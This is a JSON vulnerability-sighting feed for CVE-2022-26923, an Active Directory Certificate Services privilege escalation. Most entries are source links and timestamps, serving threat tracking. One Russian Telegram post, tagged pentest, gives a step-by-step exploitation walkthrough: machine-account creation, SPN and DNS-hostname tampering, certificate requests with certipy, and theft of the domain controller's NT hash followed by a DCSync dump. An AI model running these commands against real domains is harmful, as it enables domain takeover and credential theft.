{"vulnerability": "CVE-2022-26923", "sightings": [{"uuid": "1f944c8d-294d-418e-a2b5-630e553988c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "f18c025d-6b6d-4343-ae80-a9bf032c248d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971682", "content": "", "creation_timestamp": "2024-12-24T20:32:44.972401Z"}, {"uuid": "847c4abd-6029-495a-907a-71859923e9df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:45.000000Z"}, {"uuid": "1ee9613d-9f91-4254-9300-4164f1e68c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "0e97418f-84f2-465d-aafc-160a474c987b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb", "content": "", "creation_timestamp": "2023-01-27T14:14:45.000000Z"}, {"uuid": "0e877ba7-6e01-4be4-be1b-c59a9d227b8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3llscglbqjk2z", "content": "", "creation_timestamp": "2025-04-02T02:06:15.074049Z"}, {"uuid": "b3f790a6-a7bf-4ed0-b1a1-afe9c7157d4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llwp4g6y4e2x", "content": "", "creation_timestamp": "2025-04-03T20:03:52.291149Z"}, {"uuid": "f3cf0072-e413-4ae8-82e9-5223c8b44a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llwphvkqtn2r", "content": "", "creation_timestamp": "2025-04-03T20:10:17.356019Z"}, {"uuid": "4a364e8e-0e02-4a8f-980e-1873b576fec2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:36.000000Z"}, {"uuid": "04b0e18d-9100-445f-afb5-8caf14d2cd4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llutdd7rme2r", "content": "", "creation_timestamp": "2025-04-03T02:13:59.571437Z"}, {"uuid": "f5255f80-060e-4d2e-967e-b4bf9a935f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-218112ab-f208e40627d05bf3", "content": "", 
"creation_timestamp": "2025-04-10T09:45:37.882296Z"}, {"uuid": "4fe15223-4ca1-4209-8b27-e2ad0b972e40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=801", "content": "", "creation_timestamp": "2022-05-11T04:00:00.000000Z"}, {"uuid": "43776dd1-9bbb-4a73-872f-de25323d4313", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3565", "content": "Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\ud83d\uddbc\ufe0f\n\n\u041a\u0440\u0430\u0442\u043a\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435.\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f:\n1. \u0414\u043e\u043c\u0435\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c;\n2. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u0434\u043e\u043c\u0435\u043d;\n3. \u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 Machine;\n4. 
\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0431\u0443\u0434\u0435\u0442 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d, \u0442\u0430\u043a \u043a\u0430\u043a \u043c\u044b \u0431\u0443\u0434\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430).\n\n\ud83d\udc0d \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 Certipy, \u043a\u0440\u0430\u0442\u043a\u0430\u044f \u0441\u043f\u0440\u0430\u0432\u043a\u0430 \u043f\u043e \u043d\u0435\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0438\u0436\u0435:\n# \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\npip install certipy-ad\n\n# \u0417\u0430\u043f\u0440\u043e\u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430\n# \u0434\u043b\u044f certipy-ad v3.0.0:\ncertipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName\n# \u0434\u043b\u044f certipy-ad v4.8.2:\ncertipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10\n\n# \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM-\u0445\u044d\u0448\u0430:\ncertipy auth -pfx 
username.pfx -dc-ip 10.10.10.10\n\u041d\u0430\u0447\u043d\u0435\u043c \u0430\u0442\u0430\u043a\u0443 \u0441 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 Impacket-Addcomputer\naddcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'\n\u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0448\u0430\u0431\u043b\u043e\u043d Machine) \u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043d\u0438\u043c:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\ncertipy auth -pfx testpc.pfx\n\u0414\u0430\u043b\u0435\u0435 \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0445\u043e\u0441\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u043c\u0435\u043d\u044f\u0442\u044c SPN \u0443 \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430:\nGet-ADComputer TESTPC -properties dnshostname,serviceprincipalname\nSet-ADComputer TESTPC -DnsHostName DC.domain.local # \u0432\u0435\u0440\u043d\u0451\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 \u0438\u0437-\u0437\u0430 \u0434\u0443\u0431\u043b\u0438\u0440\u0443\u044e\u0449\u0435\u0439\u0441\u044f SPN\nSet-ADComputer TESTPC -ServicePrincipalName @{} # \u043e\u0431\u043d\u0443\u043b\u044f\u0435\u043c SPN\nSet-ADComputer TESTPC -DnsHostName DC.domain.local\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043d\u0430 
\u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u0445\u043e\u0441\u0442 \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u043d\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043f\u043e\u043b\u0447\u0435\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c NTLM \u0445\u044d\u0448 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430:\ncertipy auth -pfx dc.pfx\n...\n[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733\n\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u0430\u0442\u0430\u043a\u0443 DCSync \u043b\u044e\u0431\u044b\u043c \u0443\u0434\u043e\u0431\u043d\u044b\u043c \u0434\u043b\u044f \u043d\u0430\u0441 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u0434\u043e\u043c\u0435\u043d:\nsecretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt\n\u0412\u0435\u043a\u0442\u043e\u0440 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u043a CVE-2022-26923 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u043d\u043e \u0435\u0441\u043b\u0438 \u0432\u044b \u0432 \u043d\u0435\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c, \u0442\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c 
\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0431\u0443\u0434\u0435\u0442 \u0442\u0430\u043a \u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e, \u043a\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 ZeroLogon!\ud83d\udd3a\n#\u043f\u0435\u043d\u0442\u0435\u0441\u0442 #AD", "creation_timestamp": "2024-01-12T07:00:52.000000Z"}, {"uuid": "fdb2f553-149c-4c77-b287-ab9e1085ba1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-26923", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/b7df40e3-bcb6-4eef-8ba5-b10ddbe05789", "content": "", "creation_timestamp": "2026-02-02T12:27:17.352054Z"}, {"uuid": "f4c76028-6a58-4b76-80ac-eb3303ccf36b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2166", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aWalkthrough on the exploitation of CVE-2022-26923, a vulnerability in AD Certificate Services\nURL\uff1ahttps://github.com/r1skkam/TryHackMe-CVE-2022-26923\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-12T02:37:16.000000Z"}, {"uuid": "e2aa5864-40d2-49d0-a032-5658ef7c1052", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/poxek/2374", "content": "#Windows #CVE\n\nActive Directory Domain Service Privilege Escalation Vulnerability\nCVE-2022-26923\n\n\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 
\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043d\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c (\u0438\u043b\u0438 \u043c\u0430\u0448\u0438\u043d\u0443) \u0434\u043e\u043c\u0435\u043d\u0430. \u0412 Active Directory \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u041d\u0415 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u0441\u043b\u0443\u0436\u0431\u044b \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432, \u043d\u043e \u0435\u0441\u043b\u0438 \u043e\u043d\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u044b, \u0442\u043e \u043f\u0440\u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 \u043e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043d\u0443\u0442\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u0435\u0441\u044c \u0434\u043e\u043c\u0435\u043d. 
\u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u0442\u0435\u043e\u0440\u0438\u0438.\u00a0", "creation_timestamp": "2022-09-02T12:16:15.000000Z"}, {"uuid": "d6ebae42-b115-4ad4-b498-c5b45630c8f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/poxek/2331", "content": "#Windows #CVE \n\nMicrosoft Windows Active Directory Certificate Services Improper Authorization Privilege Escalation Vulnerability\nCVE-2022-26923\n\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043c\u0435\u0436\u043d\u044b\u043c \u0441 \u0441\u0435\u0442\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u043b\u0443\u0436\u0431\u0430\u0445 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432 Active Directory. \u0414\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f. 
\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0432\u044b\u0434\u0430\u0447\u0438 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432. \u0414\u043e\u0431\u0430\u0432\u0438\u0432 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u0437\u0430\u043f\u0440\u043e\u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0435\u043c\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0435 \u0434\u043e\u043c\u0435\u043d\u0430 \u0441 \u0432\u044b\u0441\u043e\u043a\u0438\u043c \u0443\u0440\u043e\u0432\u043d\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439. 
\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0439 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2022-08-22T07:00:59.000000Z"}, {"uuid": "12fb1e0c-81f3-47a0-bff2-6b2565d64546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "exploited", "source": "https://t.me/poxek/2362", "content": "#\u041f\u041e  #CVE\n\nCISA \u043f\u0440\u043e\u0441\u0438\u0442 \u0432\u0430\u0441 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u044d\u0442\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\nCVE-2022-22536, CVE-2022-32893, CVE-2022-32894, CVE-2022-2856, CVE-2022-21971, CVE-2022-26923, CVE-2017-15944\n\nCISA (\u0410\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u043e \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0421\u0428\u0410) 
\u043e\u0431\u043d\u043e\u0432\u0438\u043b\u043e \u0441\u0432\u043e\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0432 \u043d\u0435\u0433\u043e \u0441\u0435\u043c\u044c \u043d\u043e\u0432\u044b\u0445 \u043f\u043e\u0437\u0438\u0446\u0438\u0439. \u042d\u0442\u0438 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Apple, Google, Microsoft, Palo Alto Networks \u0438 SAP.\u00a0", "creation_timestamp": "2022-08-25T18:06:49.000000Z"}, {"uuid": "d39c2d56-cc79-479d-bbda-69f014cb4040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/poxek/2448", "content": "#\u041d\u043e\u0432\u043e\u0441\u0442\u0438\n\nMetasploit Weekly Wrap-Up\n\nThis week Metasploit has a new ICPR Certificate Management module from Oliver Lyak and our very own Spencer McIntyre, which can be utilized for issuing certificates via Active Directory Certificate Services. It has the capability to issue certificates which is useful in a few contexts including persistence, ESC1 and as a primitive necessary for exploiting CVE-2022-26923. 
The resulting PFX certificate file is stored to loot and is encrypted using a blank password.", "creation_timestamp": "2022-09-05T11:00:05.000000Z"}, {"uuid": "ffe61189-feaa-4a8c-bcd9-ae9d8cf52ed2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2188", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn improved Proof of Concept for CVE-2022-1388 w/ Interactive Shell.        No reverse tcp required!\nURL\uff1ahttps://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-14T20:49:13.000000Z"}, {"uuid": "a2df620d-a5d1-4415-b96a-b1b87ea4fa47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9520", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Active Directory Domain Privilege Escalation (CVE-2022\u201326923).\n\nhttps://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", "creation_timestamp": "2022-05-15T06:14:26.000000Z"}, {"uuid": "c9c003ea-dbab-466f-91d1-0c254c2847c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/10277", "content": "\u200aCybercriminals Evolve Social Engineering Tactics, Exploit CVE-2022-26923 in Sophisticated Campaign\n\nhttps://securityonline.info/cybercriminals-evolve-social-engineering-tactics-exploit-cve-2022-26923-in-sophisticated-campaign/", "creation_timestamp": "2024-08-17T10:33:58.000000Z"}, 
